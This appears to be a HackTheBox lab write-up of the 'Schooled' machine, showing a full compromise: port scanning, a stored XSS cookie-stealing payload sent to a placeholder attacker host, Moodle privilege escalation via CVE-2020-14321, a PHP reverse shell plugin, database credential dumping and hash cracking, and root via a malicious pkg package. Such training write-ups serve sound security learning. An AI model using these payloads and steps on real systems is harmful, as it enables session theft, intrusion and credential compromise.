![fdcb1578a7a35e87319a7e270d3465e8.png](75548eca389e4101a9b1278449efb530.png) # Port Scanning and General Enumeration (Nmap, Gobuster) Starting off with an all ports scan ``` nmap -p- -T4 -oN nmap/allports Nmap scan report for Host is up (0.052s latency). Not shown: 65532 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 33060/tcp open mysqlx ``` All ports scan shows `22`, `80` and `33036` up, so we can target those ``` nmap -T4 -p22,80,33060 -sC -sV -oN nmap/targeted Nmap scan report for Host is up (0.058s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0) | ssh-hostkey: | 2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA) | 256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA) |_ 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519) 80/tcp open http Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15 |_http-title: Schooled - A new kind of educational institute 33060/tcp open mysqlx? | fingerprint-strings: ``` Looks like something to do with **mysql** on `33060`. **Apache 2.4.46 (FreeBSD)** with **PHP 7.4.15** on the webserver on 80. Let's check that out first ![4ce5210e9996b0d51c97142e6ad4e598.png](84440b720ecd470aaedfc7f502d5399f.png) The website seems pretty boring. Nothing off in the source and the only think that really links anywhere are the options in the navbar up top. ![7e59394a37aa8e20279b4a1444b5d1a5.png](b65122d14930484da4a644568eb8ae55.png) Little bit of information in the **Contact Details** ![3e42061a2d2685c251672cdbfcb5a1bb.png](8f91e1be11bd401cbfa58b4ac754a986.png) I guess we should add `schooled.htb` to our hosts file just in case. More enumeration! **Wappalyzer**: ![4a83b380dbedef9d02a541a026482261.png](e2f17770a2ed44eebb2758dd686618d8.png) I ran a **Gobuster directory scan** using [Seclists big](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/directory-list-2.3-big.txt) but it didn't uncover anything new so I followed that up with a **Gobuster dns scan** using [Seclists 5k](https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt) ``` gobuster dns -d schooled.htb -w 5000.txt Found: moodle.schooled.htb ``` Finally, Something interesting! Add it to your hosts! --- # Access (Moodle, Stored XSS, CVE-2020-14321) So now that we're on `moodle.schooled.htb`, let's create an account and let's take a minute to browse around the site and see what's available to us. ![24302497f04971ffb8291764e7cf3899.png](3946f163151d4d2ca9bc61baa684ee6a.png) Looks like some kind of online school? ![423e008567f3d4d9555d0be8ef949587.png](860a8e022df24f0eb6d6251410721e93.png) So the **Mathematics** course is available for us to enroll in and the teacher is **Manuel Phillips**. Let's enroll and learn some math! ![4b648b95c2865a9b0632940cd31ca8f8.png](6db4bc36d91b4f289019452d75a5be02.png) Now that we're enrolled a bunch of new options opened up to us. We can view our classmates by clicking on **Participants** ![d979513b884cc6cdfecaa2ef002bb5b5.png](19ec11b4744a4cab9a276158e8baf169.png) Oh hey, the teacher is listed. Let's check out his profile ![d4f0a0323bc18e00fa9cd552d0b5ac42.png](eb0709f502434737b586da0999586c5c.png) Forum posts? ``` This is a self enrollment course. For students who wish to attend my lectures be sure that you have your MoodleNet profile set. Students who do not set their MoodleNet profiles will be removed from the course before the course is due to start and I will be checking all students who are enrolled on this course. Look forward to seeing you all soon. Manuel Phillips ``` He's going to check all of our **MoodleNet** profiles? Well we better update ours! ![8eee60965fc9a9094fe6cf46021b84d8.png](4ce70d1aafb040518d72bb52fdc979ef.png) Let's see if this is vulnerable to something like **XSS**. ![4a02b4a9a699ccfaa527f0653be915da.png](04e764eac657434bb6c1782226e0c4d3.png) ![666c48618f7780442de850c3b6ad70e4.png](108db4140e964390b2880c576b5aeb23.png) Nice. Maybe we can steal the Teacher's cookie and *become* the teacher? Let's try a basic cookie stealing payload like `<img src=x onerror=this.src='http://YOURIP:YOURPORT/?'+document.cookie;>` Fire up a quick webserver using python3 `python3 -m http.server` and see what happens ![2f2aa131b54b4a7675e97c1c3ac017d4.png](66ffe21c3980406b9688603cdd28bc3c.png) We get a hit! Well, we get a lot of hits actually.. Using that cookie and refreshing the page, we are now **Manuel Phillips**. But what good does that do us? I was on my way to unenroll all of the students when this popped up at the bottom of the page ![bc7dc3198f9e164a82df8b5088b7f795.png](77ed9d408ef242468313c32e223cb713.png) ![dc733c5d14f230a60afefe7b058a8f91.png](4d6c9102c4a242378c984a09a08ee7fd.png) So we're running version **3.9**. Doing research I noticed that there's an exploit for this version that allows a **teacher** user to escalate to a **manager** user. Someone has a **POC** available on their [GitHub](https://github.com/HoangKien1020/CVE-2020-14321) So by capturing the 'enroll' request, we can modify the **user id** value to match our teacher's **user id**, and the **role** value to **1** which *should* allow us to escalate to a manager account by using the **Login as** feature on another manager account? Let's give it a shot With **BurpSuite** running and intercepting the requests, enroll a user ![823ba55a2e8375b1805b156e910ab702.png](2cfd1d0817554ca1a3bf47db26df8fc8.png) Capture the request, send it to repeater and turn intercept **off** ![5b28ef9da2ee57db4123902e57bc28d5.png](63d1398e46c6461c9cfb4aa74b78164b.png) Refresh the page and take note of **Manuel Phillips** user id `...r/profile.php?id=24`. Back to **BurpSuite**, in the repeater tab edit the values `&userlist%5B%5D=29` to `&userlist%5B%5D=24` and `&roletoassign=5` to `&roletoassign=1` and send it through ![38e5b24d604efc5b68dd90b794699d06.png](45d0d16baf6e4e9390309b42596651e3.png) Refresh the page to see the changes. I found this to be incredibly finicky. You may need to do it quite a few times before you have both the **teacher** user as a manager and a **student** user as a manager. Once you do, navigate to their profile and click **Log in as** under **Administration** ![e5b3ef7e21e4cab7290520aa012b42d8.png](7c8b9587a17741728539722d1cd7454c.png) You should then see **Site Administration** pop up in the left nav menu ![b491daadac7f4e6a40ed9e61257400ac.png](a709252dc37e4b82801617af7c56cf07.png) Now that we have complete control over this website, let's do some prep work. 1. Download the zip file from this [Github](https://github.com/HoangKien1020/Moodle_RCE) 2. Grab the **php-reverse-shell** from [Pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php). Edit it with your **IP** and **PORT**. 3. Unzip the **rce.zip** file and **remove** `/rce/lang/en/block_rce.php`. 4. **Rename** the **php-reverse-shell.php** to **block_rce.php** and **move** it into `rce/lang/en/` 5. Rezip the **rce** directory with `zip -r rce rce` Now back to the website 1. Under **Site Administration** click **Users** 2. Under **Permissions** click **Define Roles** 3. Click **Manager** and then **Edit** 4. Make sure **BurpSuite** is running and intercepting traffic 5. Scroll all the way to the bottom and click **Save Changes** 6. Grab the request in **BurpSuite** and replace everything from **&return** to the end with the block from this [Github](https://github.com/HoangKien1020/CVE-2020-14321) *(Payload to full permissions)* 7. **Forward** the request Whew. Almost there. Now we can navigate back to **Site Administration** and.. 1. Click **Plugins** and then **Install Plugins** 2. **Choose a file...** and upload the **rce.zip** 3. Click **Install plugin from the ZIP file** Once it goes through the check successfully, click continue, fire up a listener on whatever port you set in the **php-reverse-shell**. `nc -lvnp 4444` and navigate to `/moodle/blocks/rce/lang/en/block_rce.php` ![46eb0c35d92a68f02e90ea899a874ee4.png](55b6d74bb0c64aa4a0e4177b142d333f.png) --- # User (Moodle, MySQL, Hashcat) Let's stabalize our shell. Just typing `python3` wont work, so let's check and see what packages are installed with `pkg info` ![23cbc6c8295854bb9286abd0e056bae2.png](2df08a61801649b9b342a4ceeead587f.png) So **python3** is available, let's find it using the **find** command `find . -name python3 2>/dev/null` ![352b2a0c0cbf4e8190509f3354340aac.png](5e1dcec7f7dd4cbc92a33b8e36443451.png) There it is. Let's stabalize ``` /usr/local/bin/python3 -c 'import pty; pty.spawn("/bin/bash")' Ctrl+z stty raw -echo && fg enter export TERM=xterm ``` ![86cad8ead1e7f002063b67af0792a750.png](4dbbfc412b1d41748303c04bd0a61d01.png) Now we have a good shell to do some enumeration. Let's check out the [config file](https://docs.moodle.org/311/en/Configuration_file#:~:text=The%20name%20for%20Moodle's%20configuration,located%20in%20the%20moodle%20directory.) for **moodle**. It's located at `/usr/local/www/apache24/data/moodle/config.php` ``` $CFG->dbtype = 'mysqli'; $CFG->dblibrary = 'native'; $CFG->dbhost = 'localhost'; $CFG->dbname = 'moodle'; $CFG->dbuser = 'moodle'; $CFG->dbpass = 'PlaybookMaster2020'; $CFG->prefix = 'mdl_'; $CFG->dboptions = array ( 'dbpersist' => 0, 'dbport' => 3306, 'dbsocket' => '', 'dbcollation' => 'utf8_unicode_ci', ); $CFG->wwwroot = 'http://moodle.schooled.htb/moodle'; $CFG->dataroot = '/usr/local/www/apache24/moodledata'; $CFG->admin = 'admin'; ``` Database creds! Since we can't just call **mysql**, let's see if it's in the same place as python. ![4dbf6fc754ad070b9e4a784afed8a435.png](eaa4398dbdf84118ba25a3dad39edf58.png) Looks like it! Let's roll through it 1. show databases; 2. show tables; 3. select concat(username,password) from mdl_user; ![0aa61c1bc8e21247c78f7f1f1d9cb5ae.png](6c1acff8e684439b855e06e83e2b3822.png) Hashes! Let's pull that **admin** hash offline and try to crack it. First, we need to identify it. Googling **hash $2y$10$** lead me to this [link](https://www.php.net/manual/en/function.password-hash.php) which say that it's **Blowfish**. Using [Hashcat's example hashes page](https://hashcat.net/wiki/doku.php?id=example_hashes), we can see that **Blowfish** is mode **3200**. Let's get to cracking `hashcat -m 3200 hashfile rockyou.txt` After a little time we get back `$2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW:!QAZ2wsx` Let's try to use that password to log into a new user ![dffb635d083cd3b59705295ed21cfa52.png](e8e7b86a5c734037bc09d15b9b953fb4.png) There's a couple users that have `home` directories. Let's try **jamie** first. ![5967e4d611fbfe4aa67d41a0efb5a835.png](c41268cfc7c44785b2db16078e93bfe0.png) Got it! Capture the user flag! ![107e14fd83a350ce7beaf0246d3377dc.png](578acb102a894241b82c3b1df2034466.png) # Privesc (pkg, GTFOBins, fpm) ![e5a54ee86f275f21518464e0316b7a70.png](1b052e303bba4df48a8f149fc94047a5.png) Sudo not found? Let's remedy that by setting up ssh. Cat and copy your public ssh key on your machine. If you don't have one, create a key pair using `ssh-keygen` ``` cd ~ mkdir .ssh && chmod 700 .ssh touch .ssh/authorized_keys && chmod 600 .ssh/authorized_keys echo 'YOURPUBLICKEY' >> .ssh/authorized_keys ``` Then back on your box ``` ssh [email protected] -i id_rsa ``` Now we can use `sudo -l` ``` jamie@Schooled:~ $ sudo -l User jamie may run the following commands on Schooled: (ALL) NOPASSWD: /usr/sbin/pkg update (ALL) NOPASSWD: /usr/sbin/pkg install * ``` So we can install packages and update using **sudo**. Let's check out [GTFOBins](https://gtfobins.github.io/gtfobins/pkg/) entry on **pkg** ![355a21d999526dcad858fc415dc31b95.png](ac6fdb1a79bb4d109f519bd36747118a.png) So we can use **fpm** to create a malicious package and then install it. Nice. Let's do that on our machine and transfer the malicious package over. As for the payload, all we really need to do is read the root flag. Run this on your machine ``` TF=$(mktemp -d) echo 'cat /root/root.txt' > $TF/z.sh fpm -n z -s dir -t freebsd -a all --before-install $TF/z.sh $TF ``` Transfer the package over to the machine. I used **python** and **curl** ``` curl YOURIP:YOURPORT/z-1.0.txz --output /home/jamie/z-1.0.txz ``` And now install the malicious package ``` sudo /usr/sbin/pkg install -y --no-repo-update ./z-1.0.txz ``` ![15df8cf215cd6d8e52a50fd8f143a209.png](a9336b9249b54afbb2fcbbd26a45ad40.png) Capture that flag! --- Back to [[HackTheBox Index]] Tags: #htb #hackthebox #cve-2020-14321 #moodle #reverse_shell #freebsd #pkg #xss #stored_xss #gobuster #dns #hashcracking #fpm #box_writeups Related: